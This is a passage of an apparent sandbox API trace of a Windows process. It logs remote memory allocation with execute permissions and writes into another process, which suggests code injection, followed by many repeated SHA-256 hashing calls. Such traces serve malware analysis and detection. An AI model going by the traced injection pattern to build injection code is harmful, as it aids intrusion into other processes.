0x1e0000 [0190.188] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0xce750*, nSize=0x400, lpNumberOfBytesWritten=0xce298 | out: lpBuffer=0xce750*, lpNumberOfBytesWritten=0xce298*=0x400) returned 1 [0190.189] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x188, flAllocationType=0x3000, flProtect=0x40) returned 0x4b0000 [0190.189] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x4b0000, lpBuffer=0xce548*, nSize=0x188, lpNumberOfBytesWritten=0xce298 | out: lpBuffer=0xce548*, lpNumberOfBytesWritten=0xce298*=0x188) returned 1 [0190.189] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xce1f0, nSize=0xd8, lpNumberOfBytesRead=0xce1a8 | out: lpBuffer=0xce1f0*, lpNumberOfBytesRead=0xce1a8*=0xd8) returned 1 [0190.190] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e414a0 [0190.190] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x40) returned 0x4c0000 [0190.190] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x4c0000, lpBuffer=0x32e414a0*, nSize=0x50, lpNumberOfBytesWritten=0xce1a8 | out: lpBuffer=0x32e414a0*, lpNumberOfBytesWritten=0xce1a8*=0x50) returned 1 [0190.190] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xce1f0*, nSize=0xd8, lpNumberOfBytesWritten=0xce1a8 | out: lpBuffer=0xce1f0*, lpNumberOfBytesWritten=0xce1a8*=0xd8) returned 1 [0190.191] ResetEvent (hEvent=0x640) returned 1 [0190.191] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.191] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xce1f0, nSize=0xd8, lpNumberOfBytesRead=0xce1a8 | out: lpBuffer=0xce1f0*, lpNumberOfBytesRead=0xce1a8*=0xd8) returned 1 [0190.191] VirtualFreeEx (hProcess=0x730, lpAddress=0x4c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.191] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e414a0 | out: hHeap=0x2150000) returned 1 [0190.192] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0xce750, nSize=0x400, lpNumberOfBytesRead=0xce2f8 | out: lpBuffer=0xce750*, lpNumberOfBytesRead=0xce2f8*=0x400) returned 1 [0190.192] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.192] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce178 | out: lpSystemTimeAsFileTime=0xce178*(dwLowDateTime=0xfde091e1, dwHighDateTime=0x1d7b3c9)) [0190.192] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf4e0 [0190.192] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32349170 [0190.192] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822fd0) returned 1 [0190.193] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.193] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x20, dwFlags=0x0) returned 1 [0190.193] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.193] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32acf3c0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf3c0, pdwDataLen=0xce0bc) returned 1 [0190.193] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.193] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0190.193] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.194] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.194] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x40, dwFlags=0x0) returned 1 [0190.194] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf510 [0190.194] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acf510, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf510, pdwDataLen=0xce0bc) returned 1 [0190.194] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.194] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.194] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823bd0) returned 1 [0190.194] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.194] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x60, dwFlags=0x0) returned 1 [0190.194] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf570 [0190.194] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acf570, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf570, pdwDataLen=0xce0bc) returned 1 [0190.194] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.195] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0190.195] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821ed0) returned 1 [0190.196] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.196] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0x80, dwFlags=0x0) returned 1 [0190.196] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.196] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3f0 [0190.196] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32acf3f0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf3f0, pdwDataLen=0xce0bc) returned 1 [0190.196] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.200] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0190.200] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.201] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.201] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0190.201] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.201] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfae0 [0190.201] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acfae0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfae0, pdwDataLen=0xce0bc) returned 1 [0190.201] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.201] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.201] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.202] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.202] CryptHashData (hHash=0x3396eda0, pbData=0x32349170, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0190.202] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf5a0 [0190.202] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32acf5a0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf5a0, pdwDataLen=0xce0bc) returned 1 [0190.202] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0190.202] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.202] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.202] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.202] CryptHashData (hHash=0x3396f3c0, pbData=0x32349170, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0190.202] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf5d0 [0190.202] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32acf5d0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf5d0, pdwDataLen=0xce0bc) returned 1 [0190.202] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0190.202] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.202] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821ed0) returned 1 [0190.203] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.203] CryptHashData (hHash=0x3396f190, pbData=0x32349170, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.203] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.203] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32acf840, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf840, pdwDataLen=0xce0bc) returned 1 [0190.203] CryptDestroyHash (hHash=0x3396f190) returned 1 [0190.203] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0190.203] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.204] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.204] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x120, dwFlags=0x0) returned 1 [0190.204] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf8a0 [0190.204] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acf8a0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf8a0, pdwDataLen=0xce0bc) returned 1 [0190.204] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.204] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.204] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ad0) returned 1 [0190.204] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.204] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x140, dwFlags=0x0) returned 1 [0190.204] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0190.204] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acfa50, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfa50, pdwDataLen=0xce0bc) returned 1 [0190.204] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.204] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0190.205] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.205] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.205] CryptHashData (hHash=0x3396eef0, pbData=0x32349170, dwDataLen=0x160, dwFlags=0x0) returned 1 [0190.205] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.205] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf9c0 [0190.205] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32acf9c0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acf9c0, pdwDataLen=0xce0bc) returned 1 [0190.205] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0190.205] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.205] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822bd0) returned 1 [0190.206] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.206] CryptHashData (hHash=0x3396f5f0, pbData=0x32349170, dwDataLen=0x180, dwFlags=0x0) returned 1 [0190.206] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.206] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa80 [0190.206] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32acfa80, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfa80, pdwDataLen=0xce0bc) returned 1 [0190.206] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0190.206] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0190.206] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.206] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.206] CryptHashData (hHash=0x3396f6d0, pbData=0x32349170, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0190.207] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfb40 [0190.207] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32acfb40, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfb40, pdwDataLen=0xce0bc) returned 1 [0190.207] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0190.207] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.207] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.207] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.207] CryptHashData (hHash=0x3396f120, pbData=0x32349170, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0190.207] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acefa0 [0190.207] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32acefa0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acefa0, pdwDataLen=0xce0bc) returned 1 [0190.207] CryptDestroyHash (hHash=0x3396f120) returned 1 [0190.207] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.207] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.208] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.208] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0190.208] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.208] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acefd0 [0190.208] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acefd0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acefd0, pdwDataLen=0xce0bc) returned 1 [0190.208] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.208] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.208] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.209] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.209] CryptHashData (hHash=0x3396f430, pbData=0x32349170, dwDataLen=0x200, dwFlags=0x0) returned 1 [0190.209] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0620 [0190.209] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32ad0620, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0620, pdwDataLen=0xce0bc) returned 1 [0190.209] CryptDestroyHash (hHash=0x3396f430) returned 1 [0190.209] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.209] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.209] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.209] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x220, dwFlags=0x0) returned 1 [0190.209] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad00b0 [0190.209] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad00b0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad00b0, pdwDataLen=0xce0bc) returned 1 [0190.209] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.209] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.210] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.210] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.210] CryptHashData (hHash=0x3396eb70, pbData=0x32349170, dwDataLen=0x240, dwFlags=0x0) returned 1 [0190.210] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfde0 [0190.210] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32acfde0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfde0, pdwDataLen=0xce0bc) returned 1 [0190.210] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0190.210] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.210] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338230d0) returned 1 [0190.211] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.211] CryptHashData (hHash=0x3396efd0, pbData=0x32349170, dwDataLen=0x260, dwFlags=0x0) returned 1 [0190.211] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.211] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0260 [0190.211] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32ad0260, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0260, pdwDataLen=0xce0bc) returned 1 [0190.211] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0190.211] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0190.211] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338220d0) returned 1 [0190.211] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.211] CryptHashData (hHash=0x3396efd0, pbData=0x32349170, dwDataLen=0x280, dwFlags=0x0) returned 1 [0190.211] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.211] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0440 [0190.211] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32ad0440, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0440, pdwDataLen=0xce0bc) returned 1 [0190.212] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0190.212] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0190.212] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.212] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.212] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0190.212] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.212] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfba0 [0190.212] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32acfba0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfba0, pdwDataLen=0xce0bc) returned 1 [0190.212] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.212] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.212] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821dd0) returned 1 [0190.213] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.213] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0190.213] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0740 [0190.213] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32ad0740, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0740, pdwDataLen=0xce0bc) returned 1 [0190.213] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.213] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0190.213] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823ad0) returned 1 [0190.214] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.214] CryptHashData (hHash=0x3396f580, pbData=0x32349170, 